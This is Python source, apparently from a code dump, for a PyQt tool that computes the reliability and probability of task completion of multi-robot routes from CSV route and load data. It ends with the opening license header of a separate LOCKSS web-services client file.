self.label_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_9.setObjectName("label_9")
self.spinBox_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_route_count.setGeometry(QtCore.QRect(275, 250, 100, 35))
self.spinBox_route_count.setMaximum(100000)
self.spinBox_route_count.setObjectName("spinBox_route_count")
self.label_10 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_10.setGeometry(QtCore.QRect(120, 290, 271, 41))
font = QtGui.QFont()
font.setPointSize(8)
self.label_10.setFont(font)
self.label_10.setTextFormat(QtCore.Qt.AutoText)
self.label_10.setScaledContents(False)
self.label_10.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_10.setWordWrap(True)
self.label_10.setObjectName("label_10")
self.label_3 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_3.setGeometry(QtCore.QRect(0, 100, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_3.setObjectName("label_3")
self.comboBox_load_data = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_load_data.setGeometry(QtCore.QRect(275, 100, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_load_data.setFont(font)
self.comboBox_load_data.setObjectName("comboBox_load_data")
self.spinBox_robot_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_robot_route_count.setGeometry(QtCore.QRect(275, 50, 100, 35))
self.spinBox_robot_route_count.setMinimum(1)
self.spinBox_robot_route_count.setMaximum(1000)
self.spinBox_robot_route_count.setObjectName("spinBox_robot_route_count")
self.pushButton_set_robot_count = QtWidgets.QPushButton(self.groupBox_selection_analysis)
self.pushButton_set_robot_count.setGeometry(QtCore.QRect(460, 40, 100, 50))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_set_robot_count.setFont(font)
self.pushButton_set_robot_count.setObjectName("pushButton_set_robot_count")
self.label_11 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_11.setGeometry(QtCore.QRect(0, 50, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_11.setFont(font)
self.label_11.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_11.setObjectName("label_11")
self.plainTextEdit_result_view = QtWidgets.QPlainTextEdit(self.centralwidget)
self.plainTextEdit_result_view.setGeometry(QtCore.QRect(620, 35, 300, 500))
self.plainTextEdit_result_view.setReadOnly(True)
self.plainTextEdit_result_view.setPlainText("")
self.plainTextEdit_result_view.setObjectName("plainTextEdit_result_view")
self.pushButton_start_analysis = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_start_analysis.setGeometry(QtCore.QRect(690, 550, 150, 75))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_start_analysis.setFont(font)
self.pushButton_start_analysis.setObjectName("pushButton_start_analysis")
self.groupBox_robot_configuration = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_robot_configuration.setEnabled(False)
self.groupBox_robot_configuration.setGeometry(QtCore.QRect(20, 400, 570, 271))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_robot_configuration.setFont(font)
self.groupBox_robot_configuration.setObjectName("groupBox_robot_configuration")
self.label_12 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_12.setGeometry(QtCore.QRect(0, 30, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_12.setFont(font)
self.label_12.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_12.setObjectName("label_12")
self.comboBox_select_robot = QtWidgets.QComboBox(self.groupBox_robot_configuration)
self.comboBox_select_robot.setGeometry(QtCore.QRect(275, 30, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_robot.setFont(font)
self.comboBox_select_robot.setObjectName("comboBox_select_robot")
self.label_7 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_7.setGeometry(QtCore.QRect(400, 230, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_7.setFont(font)
self.label_7.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_7.setObjectName("label_7")
self.label_6 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_6.setGeometry(QtCore.QRect(400, 180, 71, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_6.setFont(font)
self.label_6.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_6.setObjectName("label_6")
self.doubleSpinBox_nominal_capacity_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_nominal_capacity_value.setGeometry(QtCore.QRect(275, 230, 100, 35))
self.doubleSpinBox_nominal_capacity_value.setDecimals(1)
self.doubleSpinBox_nominal_capacity_value.setMaximum(100000.0)
self.doubleSpinBox_nominal_capacity_value.setSingleStep(0.5)
self.doubleSpinBox_nominal_capacity_value.setObjectName("doubleSpinBox_nominal_capacity_value")
self.doubleSpinBox_robot_speed_value = QtWidgets.QDoubleSpinBox(self.groupBox_robot_configuration)
self.doubleSpinBox_robot_speed_value.setGeometry(QtCore.QRect(275, 180, 100, 35))
self.doubleSpinBox_robot_speed_value.setDecimals(3)
self.doubleSpinBox_robot_speed_value.setMaximum(100.0)
self.doubleSpinBox_robot_speed_value.setObjectName("doubleSpinBox_robot_speed_value")
self.label_4 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_4.setGeometry(QtCore.QRect(0, 230, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_4.setFont(font)
self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_4.setObjectName("label_4")
self.lineEdit_hazard_rate_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_hazard_rate_value.setGeometry(QtCore.QRect(275, 80, 200, 35))
self.lineEdit_hazard_rate_value.setObjectName("lineEdit_hazard_rate_value")
self.label = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label.setGeometry(QtCore.QRect(0, 80, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_2.setGeometry(QtCore.QRect(0, 180, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.lineEdit_start_reliability_value = QtWidgets.QLineEdit(self.groupBox_robot_configuration)
self.lineEdit_start_reliability_value.setGeometry(QtCore.QRect(275, 130, 200, 35))
self.lineEdit_start_reliability_value.setObjectName("lineEdit_start_reliability_value")
self.label_13 = QtWidgets.QLabel(self.groupBox_robot_configuration)
self.label_13.setGeometry(QtCore.QRect(0, 130, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_13.setFont(font)
self.label_13.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_13.setObjectName("label_13")
MainWindow.setCentralWidget(self.centralwidget)
# ---------------------------------------------------------------------------------------------------------------
self.potc_gui_main_func()
# ---------------------------------------------------------------------------------------------------------------
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Prognostic Aware Multi Robot Route Planning"))
self.groupBox_selection_analysis.setTitle(_translate("MainWindow", "Analysis Options"))
self.label_5.setText(_translate("MainWindow", "Select Threshold Type"))
self.label_8.setText(_translate("MainWindow", "Threshold Value"))
self.label_9.setText(_translate("MainWindow", "Route Count"))
self.label_10.setText(_translate("MainWindow", "Note: It refers to the number of routes to be analyzed. If the value is 0, it refers to the maximum value."))
self.label_3.setText(_translate("MainWindow", "Use Load Data"))
self.pushButton_set_robot_count.setText(_translate("MainWindow", "Set Count"))
self.label_11.setText(_translate("MainWindow", "Set Robot Count"))
self.pushButton_start_analysis.setText(_translate("MainWindow", "Start Analysis"))
self.groupBox_robot_configuration.setTitle(_translate("MainWindow", "Robot Configuration"))
self.label_12.setText(_translate("MainWindow", "Select Robot"))
self.label_7.setText(_translate("MainWindow", "kg"))
self.label_6.setText(_translate("MainWindow", "km / h"))
self.label_4.setText(_translate("MainWindow", "Nominal Capacity Value"))
self.label.setText(_translate("MainWindow", "Hazard Rate Value"))
self.label_2.setText(_translate("MainWindow", "Robot Speed Value"))
self.label_13.setText(_translate("MainWindow", "Start Reliability Value"))
# ------------------------------------------------------------------------------------------------
def potc_gui_main_func(self):
self.gui_default_parameters_func()
self.potc_gui_events_func()
def gui_default_parameters_func(self):
#self.lineEdit_hazard_rate_value.setText("5.07e-04")
#self.doubleSpinBox_robot_speed_value.setValue(4.32)
load_data_list = list(["True", "False"])
self.comboBox_load_data.addItems(load_data_list)
#self.doubleSpinBox_nominal_capacity_value.setValue(200.0)
filter_list = list(["POTC Value", "Reliability Value"])
self.comboBox_select_threshold_type.addItems(filter_list)
self.doubleSpinBox_threshold_value.setValue(0.5)
self.spinBox_route_count.setValue(0)
self.comboBox_select_robot.addItem("None")
self.pushButton_start_analysis.setEnabled(False)
def potc_gui_events_func(self):
self.pushButton_set_robot_count.clicked.connect(self.click_set_robot_count_button_func)
self.pushButton_start_analysis.clicked.connect(self.click_start_analysis_button_func)
self.lineEdit_hazard_rate_value.textChanged.connect(self.event_lineEdit_hazard_rate_value_func)
self.doubleSpinBox_robot_speed_value.valueChanged.connect(self.event_doubleSpinBox_robot_speed_value_func)
self.comboBox_load_data.currentIndexChanged.connect(self.event_comboBox_load_data_func)
self.doubleSpinBox_nominal_capacity_value.valueChanged.connect(self.event_doubleSpinBox_nominal_capacity_value_func)
self.comboBox_select_threshold_type.currentIndexChanged.connect(self.event_comboBox_select_threshold_type_func)
self.doubleSpinBox_threshold_value.valueChanged.connect(self.event_doubleSpinBox_threshold_value_func)
self.spinBox_route_count.valueChanged.connect(self.event_spinBox_route_count_func)
self.comboBox_select_robot.currentIndexChanged.connect(self.event_comboBox_select_robot_func)
self.lineEdit_start_reliability_value.textChanged.connect(self.event_lineEdit_start_reliability_value_func)
def click_set_robot_count_button_func(self):
self.robot_count = self.spinBox_robot_route_count.value()
if self.robot_count > 3:
self.robot_count = 3
self.initial_configuration_dicts_func(self.robot_count)
print(self.initial_configuration_dict)
robot_list = list()
for item in range(len(list(self.initial_configuration_dict.keys()))):
robot_list.append(str("Robot " + str(item + 1)))
self.comboBox_select_robot.addItems(robot_list)
self.label_11.setEnabled(False)
self.spinBox_robot_route_count.setEnabled(False)
self.pushButton_set_robot_count.setEnabled(False)
self.groupBox_robot_configuration.setEnabled(True)
self.pushButton_start_analysis.setEnabled(True)
def click_start_analysis_button_func(self):
try:
potc_class = CalculatePOTC(self.robot_count, self.robot_main_dict, self.initial_configuration_dict, self.distance_list, self.load_control, self.threshold_type, self.threshold_value, self.route_count)
#potc_class.calculate_main_potc_func()
calculate_thread = threading.Thread(target=potc_class.calculate_main_potc_func)
calculate_thread.start()
calculate_thread.join()
now = datetime.now()
dt_string = now.strftime("%Y_%m_%d_-_%H_%M_%S")
if self.load_control:
file_name = str("potc_analysis_loaded_" + str(dt_string))
else:
file_name = str("potc_analysis_unloaded_" + str(dt_string))
self.csv_write(potc_class.write_data_list, file_name)
print("\n\n\nDosya Yazma islemi Basari ile gerceklesti")
set_value = potc_class.selected_route_count_list
self.set_plain_text_edit_result_view_func(set_value)
except Exception as err:
print("\n\nError: click_start_analysis_button_func")
print(err)
def event_lineEdit_hazard_rate_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_hazard_rate_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_hazard_rate_value_func")
print(err)
def event_doubleSpinBox_robot_speed_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_robot_speed_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_robot_speed_value_func")
print(err)
def event_comboBox_load_data_func(self):
try:
get_value = str(self.comboBox_load_data.currentText())
if get_value == "True":
self.load_control = True
else:
self.load_control = False
except Exception as err:
print("\n\nError: comboBox_load_data")
print(err)
def event_doubleSpinBox_nominal_capacity_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.doubleSpinBox_nominal_capacity_value.value()
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"] = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_nominal_capacity_value_func")
print(err)
def event_comboBox_select_threshold_type_func(self):
try:
get_value = str(self.comboBox_select_threshold_type.currentText())
if get_value == "POTC Value":
self.threshold_type = True
elif get_value == "Reliability Value":
self.threshold_type = False
except Exception as err:
print("\n\nError: event_comboBox_select_threshold_type_func")
print(err)
def event_doubleSpinBox_threshold_value_func(self):
try:
get_value = self.doubleSpinBox_threshold_value.value()
self.threshold_value = float(get_value)
except Exception as err:
print("\n\nError: event_doubleSpinBox_threshold_value_func")
print(err)
def event_spinBox_route_count_func(self):
try:
get_value = self.spinBox_route_count.value()
self.route_count = int(get_value)
except Exception as err:
print("\n\nError: event_spinBox_route_count_func")
print(err)
def event_comboBox_select_robot_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
if selected_cb_robot != "None" and selected_cb_robot != "":
selected_robot = selected_cb_robot.split("Robot ")[-1]
self.set_enable_robot_configuration_group_func(True)
self.lineEdit_hazard_rate_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Hazard Rate"]))
self.lineEdit_start_reliability_value.setText(str(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"]))
self.doubleSpinBox_robot_speed_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Speed"]))
self.doubleSpinBox_nominal_capacity_value.setValue(float(self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Nominal Capacity"]))
else:
self.lineEdit_hazard_rate_value.setText("")
self.lineEdit_start_reliability_value.setText("")
self.doubleSpinBox_robot_speed_value.setValue(0.0)
self.doubleSpinBox_nominal_capacity_value.setValue(0.0)
self.set_enable_robot_configuration_group_func(False)
except Exception as err:
print("\n\nError: event_comboBox_select_robot_func")
print(err)
def event_lineEdit_start_reliability_value_func(self):
try:
selected_cb_robot = str(self.comboBox_select_robot.currentText())
selected_robot = selected_cb_robot.split("Robot ")[-1]
if selected_cb_robot != "None" and selected_cb_robot != "":
get_value = self.lineEdit_start_reliability_value.text()
if get_value != "":
self.initial_configuration_dict[str("robot_" + str(selected_robot))]["Reliability"] = float(get_value)
except Exception as err:
print("\n\nError: event_lineEdit_start_reliability_value_func")
print(err)
def set_plain_text_edit_result_view_func(self, set_value):
self.plainTextEdit_result_view.clear()
write_value = ""
for item in set_value:
temp = str(item[0]) + "\t-> " + str(item[1])
write_value = write_value + "\n" + temp
self.plainTextEdit_result_view.setPlainText(write_value)
# ------------------------------------------------------------------------------------------------
@classmethod
def get_current_workspace(cls):
"""
Get Current Workspace Function
"""
file_full_path = os.path.dirname(os.path.realpath(__file__))
directory_name = sys.argv[0].split('/')[-2]
workspace_name = file_full_path.split(str(directory_name))[0]
return workspace_name
def read_distance_file_func(self):
df = pd.read_csv(str(self.current_workspace) + 'potc_analysis/params/distances.csv', sep=',', header=None)
self.distance_list = df.values
def read_route_loads_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/1003_routeLoads.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_load_dict = dict()
for row in read_data:
robot_load_list = list()
for row_count in range(self.robot_column_no_dict["Yuk"]["Count"]):
robot_load_list.append(float(row[int(self.robot_column_no_dict["Yuk"][str(robot_no)] + row_count)]))
robot_load_dict[str(row[0])] = robot_load_list
self.robot_main_dict["Yuk"][str("robot_" + str(robot_no))] = robot_load_dict
def read_route_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/1003_routeSet.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_route_dict = dict()
for row in read_data:
robot_route_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)])):
robot_route_list.append(float(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] + row_count)]))
robot_route_dict[str(row[0])] = robot_route_list
self.robot_main_dict["Mesafe"][str("robot_" + str(robot_no))] = robot_route_dict
def read_speed_func(self, robot_no):
with open(str(self.current_workspace) + 'potc_analysis/params/1003_routeSet.csv', 'r') as csvfile:
read_data = csv.reader(csvfile, delimiter=',')
next(read_data)
robot_speed_dict = dict()
for row in read_data:
robot_speed_list = list()
for row_count in range(int(row[int(self.robot_column_no_dict["Mesafe"][str(robot_no)] - 1)]) - 1):
robot_speed_list.append(float(row[int(self.robot_column_no_dict["Hiz"][str(robot_no)] + row_count)]))
robot_speed_dict[str(row[0])] = robot_speed_list
self.robot_main_dict["Hiz"][str("robot_" + str(robot_no))] = robot_speed_dict
def main_read_func(self):
self.read_distance_file_func()
self.read_route_loads_func(1)
self.read_route_loads_func(2)
self.read_route_loads_func(3)
self.read_route_func(1)
self.read_route_func(2)
self.read_route_func(3)
#self.read_speed_func(1)
#self.read_speed_func(2)
#self.read_speed_func(3)
def csv_write(self, write_data_list, file_name):
with open(str(self.current_workspace) + 'potc_analysis/params/write_data/'+ str(file_name) + '.csv','w+') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(write_data_list)
csvFile.close()
# -------------------------------------------------------------------
def initial_configuration_dicts_func(self, robot_count):
for item in range(robot_count):
self.initial_configuration_dict[str("robot_" + str(item + 1))] = {"Hazard Rate": float(5.07e-04), "Reliability": float(1), "Nominal Capacity": float(200), "Speed": float(4.32)}
def set_enable_robot_configuration_group_func(self, status):
self.lineEdit_hazard_rate_value.setEnabled(status)
self.lineEdit_start_reliability_value.setEnabled(status)
self.doubleSpinBox_robot_speed_value.setEnabled(status)
self.doubleSpinBox_nominal_capacity_value.setEnabled(status)
self.label.setEnabled(status)
self.label_13.setEnabled(status)
self.label_2.setEnabled(status)
self.label_4.setEnabled(status)
self.label_6.setEnabled(status)
self.label_7.setEnabled(status)
# -------------------------------------------------------------------
class CalculatePOTC:
"""
km / h
"""
def __init__(self, robot_count, robot_main_dict, initial_configuration_dict, distance_list, load_control, threshold_type, threshold_value, route_count):
self.robot_count = robot_count
self.initial_configuration_dict = initial_configuration_dict
self.robot_main_dict = robot_main_dict
self.distance_list = distance_list
self.load_control = load_control
self.threshold_type = threshold_type
self.threshold_value = threshold_value
if route_count == 0:
self.robot_main_dict_count = len(list(self.robot_main_dict["Mesafe"][str("robot_" + str(self.robot_count))].keys()))
self.route_count = self.robot_main_dict_count
else:
self.route_count = route_count
self.write_data_list = list()
self.selected_route_count_list = list()
self.system_main_dict = dict()
self.system_main_dict["0"] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list(), "Robot Time": list(), "Robot Distance": list()}
self.initial_system_main_dict_func()
@classmethod
def failure_rate_calculation_using_operating_load_func(cls, failure_rate, p_value, p_0):
"""
λ = λ0 * ((P + P0) / P0) ^ 3
"""
result = float(failure_rate * pow(((float(p_value) + float(p_0)) / float(p_0)), 3))
return result
@classmethod
def probability_of_task_completion_formula(cls, reliability, distance):
potc_result = float(pow(float(reliability), float(distance)))
return potc_result
@classmethod
def calculate_time_func(cls, distance, speed):
time = float(distance / speed)
return time
@classmethod
def reliability_exponential_func(cls, reliability_time, failure_rate):
"""
Reliability Model = Exponential Distribution
R = e ^ -(λt)
"""
return float(math.exp(float(-1) * float(reliability_time) * float(failure_rate)))
@classmethod
def time_convert_function(cls, time_value):
seconds = float(time_value)*60*60
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
result = "%02d:%02d:%02d"%(hours,minutes,seconds)
return result
def initial_system_main_dict_func(self):
robot_reliability_list = list()
robot_time_list = list()
robot_distance_list = list()
for item in range(self.robot_count):
robot_reliability_list.append(self.initial_configuration_dict[str("robot_" + str(item + 1))]["Reliability"])
robot_time_list.append(float(0.0))
robot_distance_list.append(float(0.0))
self.system_main_dict["0"]["Robot Reliability"] = robot_reliability_list
self.system_main_dict["0"]["Robot Time"] = robot_time_list
self.system_main_dict["0"]["Robot Distance"] = robot_distance_list
def set_write_data_list_func(self):
key_count = len(list(self.system_main_dict.keys()))
# Headers
temp_list = list()
temp_list.append("Count")
temp_list.append(str(""))
temp_list.append("Secili Rota")
temp_list.append(str(""))
temp_list.append("POTC")
temp_list.append(str(""))
temp_list.append("Reliability")
temp_list.append(str(""))
temp_list.append("Robot Reliability ->")
temp_list.append("Robot 1")
temp_list.append("Robot 2")
temp_list.append("Robot 3")
temp_list.append(str(""))
temp_list.append("Robot Zaman ->")
temp_list.append("Robot 1")
temp_list.append("Robot 2")
temp_list.append("Robot 3")
temp_list.append(str(""))
temp_list.append("Robot Mesafe ->")
temp_list.append("Robot 1")
temp_list.append("Robot 2")
temp_list.append("Robot 3")
temp_list.append(str(""))
temp_list.append("Ortalama Zaman")
temp_list.append(str(""))
temp_list.append("Ortalama Mesafe")
temp_list.append(str(""))
temp_list.append("Rota Secilme Miktari ->")
temp_list.append("Rota Numarasi")
temp_list.append("Secilme Miktari")
self.write_data_list.append(temp_list)
filter_list = list()
for item in range(key_count):
temp_list = list()
time_list = list()
distance_list = list()
temp_list.append(str(item))
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Secili Rota"])
filter_list.append(self.system_main_dict[str(item)]["Secili Rota"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["POTC"])
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Reliability"])
temp_list.append(str(""))
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][0])
temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][1])
temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][2])
temp_list.append(str(""))
temp_list.append(str(""))
temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][0]))
temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][1]))
temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][2]))
temp_list.append(str(""))
time_list.append(self.system_main_dict[str(item)]["Robot Time"][0]) # Time Average
time_list.append(self.system_main_dict[str(item)]["Robot Time"][1]) # Time Average
time_list.append(self.system_main_dict[str(item)]["Robot Time"][2]) # Time Average
temp_list.append(str(""))
temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][0])
temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][1])
temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][2])
temp_list.append(str(""))
distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][0]) # Distance Average
distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][1]) # Distance Average
distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][2]) # Distance Average
time_average = self.average_list_func(time_list)
temp_list.append(self.time_convert_function(time_average))
temp_list.append(str(""))
distance_average = self.average_list_func(distance_list)
temp_list.append(distance_average)
self.write_data_list.append(temp_list)
uniq_filter_list = list(dict.fromkeys(filter_list))
for item in uniq_filter_list:
if item != 0:
temp = [item, filter_list.count(item)]
self.selected_route_count_list.append(temp)
for i in range(len(self.selected_route_count_list)):
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(str(""))
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][0])
self.write_data_list[(i+1)].append(self.selected_route_count_list[i][1])
def average_list_func(self, temp_list):
result = 0.0
for item in temp_list:
result += float(item)
list_count = len(temp_list)
average_result = float(result / list_count)
return average_result
def calculate_system_reliability_func(self, robot_reliability_list):
system_reliability = 1
for rlblty in robot_reliability_list:
system_reliability *= rlblty
return system_reliability
def get_mesafe_and_zaman_list_func(self, temp_mesafe_list, robot_cnt):
list_count = len(temp_mesafe_list)
mesafe_list = list()
zaman_list = list()
for count in range(list_count - 1):
mesafe = float(self.distance_list[int(temp_mesafe_list[count])][int(temp_mesafe_list[count + 1])]) / 1000
robot_speed_value = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Speed"])
zaman = self.calculate_time_func(mesafe, robot_speed_value)
mesafe_list.append(mesafe)
zaman_list.append(zaman)
return mesafe_list, zaman_list
def calculate_potc_and_reliability_func(self, process_count, mesafe_list, zaman_list, route_cnt, robot_cnt):
time_value = 0
distance_value = 0
reliability_value = self.system_main_dict[str(process_count - 1)]["Robot Reliability"][robot_cnt - 1]
potc_value = 0
for item_count in range(len(mesafe_list)):
selected_robot_hazard_rate = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Hazard Rate"])
selected_robot_nominal_capacity = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Nominal Capacity"])
if self.load_control:
p_value = self.robot_main_dict["Yuk"][str("robot_" + str(robot_cnt))][str(route_cnt)][item_count]
hazard_rate = self.failure_rate_calculation_using_operating_load_func(selected_robot_hazard_rate, p_value, selected_robot_nominal_capacity)
else:
hazard_rate = selected_robot_hazard_rate
time_value += zaman_list[item_count]
distance_value += mesafe_list[item_count]
new_reliability = self.reliability_exponential_func(zaman_list[item_count], hazard_rate)
reliability_value = reliability_value * new_reliability
potc_value = self.probability_of_task_completion_formula(reliability_value, mesafe_list[item_count])
return potc_value, reliability_value, time_value, distance_value
def calculate_robot_potc_and_reliability_func(self, process_count, route_cnt):
robot_potc_value = 1
robot_reliability_value_list = list()
robot_distance_list = list()
robot_time_list = list()
for j in range(self.robot_count):
robot_cnt = int(j + 1)
mesafe_list = list()
zaman_list = list()
temp_mesafe_list = list(self.robot_main_dict["Mesafe"][str("robot_" + str(robot_cnt))][str(route_cnt)])
mesafe_list, zaman_list = self.get_mesafe_and_zaman_list_func(temp_mesafe_list, robot_cnt)
potc_value, reliability_value, time_value, distance_value = self.calculate_potc_and_reliability_func(process_count, mesafe_list, zaman_list, route_cnt, robot_cnt)
robot_potc_value *= potc_value
robot_reliability_value_list.append(reliability_value)
robot_time_list.append(time_value)
robot_distance_list.append(distance_value)
return robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list
def calculate_main_potc_func(self):
loop_control = False
process_count = 0
while not loop_control:
process_count += 1
self.system_main_dict[str(process_count)] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list()}
potc_list = list([0])
robot_reliability_list = list([0])
system_reliability_list = list([0])
time_list = list([0])
distance_list = list([0])
for i in range(self.route_count):
route_cnt = int(i + 1)
robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list = self.calculate_robot_potc_and_reliability_func(process_count, route_cnt)
potc_list.append(float(robot_potc_value))
robot_reliability_list.append(robot_reliability_value_list)
system_reliability_value = self.calculate_system_reliability_func(robot_reliability_value_list)
system_reliability_list.append(float(system_reliability_value))
time_list.append(robot_time_list)
distance_list.append(robot_distance_list)
if self.threshold_type:
best_value_index = potc_list.index(max(potc_list))
if potc_list[best_value_index] < self.threshold_value:
loop_control = True
else:
best_value_index = system_reliability_list.index(max(system_reliability_list))
if system_reliability_list[best_value_index] < self.threshold_value:
loop_control = True
self.system_main_dict[str(process_count)]["POTC"] = potc_list[best_value_index]
self.system_main_dict[str(process_count)]["Reliability"] = system_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Secili Rota"] = best_value_index
self.system_main_dict[str(process_count)]["Robot Reliability"] = robot_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Time"] = time_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Distance"] = distance_list[best_value_index]
print("Process Count -> " + str(process_count) + " Selected Route -> " + str(best_value_index))
self.set_write_data_list_func()
if __name__ == '__main__':
#try:
#rospy.init_node('start_potc_analysis')
app = QtWidgets.QApplication(sys.argv)
MAIN_WINDOW = QtWidgets.QMainWindow()
POTC_Gui = POTC_Analysis()
POTC_Gui.setupUi(MAIN_WINDOW)
MAIN_WINDOW.show()
sys.exit(app.exec_())
"""
except Exception as err:
print(err)
"""
|
contentconfigurationservice.py | #!/usr/bin/env python
'''A library and a command line tool to interact with the LOCKSS daemon's
content configuration service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2016, Board of Trustees of Leland Stanford Jr. University
All rights reserved.'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
